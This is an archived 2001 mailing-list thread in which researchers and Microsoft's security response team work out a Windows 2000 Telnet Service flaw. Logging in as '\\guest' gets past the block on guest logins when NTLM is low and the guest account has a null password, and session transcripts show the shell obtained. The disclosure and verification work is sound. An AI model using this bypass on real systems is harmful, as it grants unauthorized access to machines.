Vulnerability Development mailing list archives
Re: (MSRC HES) : is this something?
From: Philip Stoev <philip () STOEV ORG>
Date: Thu, 18 Jan 2001 09:24:09 +0200
Looks like one needs to have an _enabled_ guest account and NTLM less than 2 in order to be vulnerable. Setting NTLM to 1 does not change this behavior. If the guest account has a password on it, one needs to supply it.

I also tried with the Administrator account -- one can get in using both \\Administrator and Administrator, however the password must be known.

In brief, this seems to work only on enabled guest accounts with null passwords and NTLM less than 2. I think that there is something in Microsoft's telnet daemon that is meant to block guest logins, however it does not block \\guest ones and they go through fine if one knows the password.

Philip

Against NTLM = 0 and guest account _enabled_ with no password:

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:[just hit ENTER]
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>

Against NTLM = 0 and guest account _disabled_ with no password:

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:[hit ENTER here]
Logon failure: account currently disabled.

----- Original Message -----
From: "Microsoft Security Response Center" <secure () microsoft com>
To: "Microsoft Security Response Center" <secure () microsoft com>; "'Philip Stoev'" <philip () stoev org>
Sent: Wednesday, January 17, 2001 11:19 PM
Subject: RE: (MSRC HES) : is this something?

Against Professional with NTLM at 0

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:
Logon failure: account currently disabled.
Login Failed
login:

----------------------------------------------------

Against AD server with NTLM at 0 - Guest acct disabled and acct pwd is null

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:
Logon failure: unknown user name or bad password.
Login Failed
login:

-----Original Message-----
From: Microsoft Security Response Center
Sent: Wednesday, January 17, 2001 1:13 PM
To: 'Philip Stoev'
Cc: Microsoft Security Response Center
Subject: (MSRC HES) : is this something?

Hi Philip -

I'm having troubles verifying this. What NTLM setting are you using - 0, 1, or 2? Are you just supplying a null password for Guest? I'm assuming that the Guest account pwd was not modified...

I'm trying this against an AD Win2K Server. I'll try it against my WS right now...

--eric

-----Original Message-----
From: Philip Stoev [mailto:philip () stoev org]
Sent: Wednesday, January 17, 2001 11:29 AM
To: sween; VULN-DEV () SECURITYFOCUS COM; Microsoft Security Response Center
Subject: Re: is this something?

I was able to confirm that on a vanilla, unpatched Windows 2000 Professional without SP1 with NTLM set to 0. It seems to me that only Microsoft's telnet server is affected -- I also tried on a sshd server for Windows 2000 by Brandon Zehm <caspian () linuxfreak com>, however it does not appear to be affected.

Philip

----- Original Message -----
From: "sween" <sween () MODELM ORG>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Wednesday, January 17, 2001 8:29 AM
Subject: is this something?

I usually just browse through the messages on this list to play with people's neat sploits and such... I'm going to get brave and post something I found playing around this evening... your thoughts on this:

WINDOWS 2000Pro, Telnet service started with NTLM turned off...

$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>

UNC dealy? misconfig? lack of config? lack of coffee?

Thank you for your time.

Ron Sweeney
-sween

 ---
| M | http://www.modelm.org
 ---
"clickity, clack."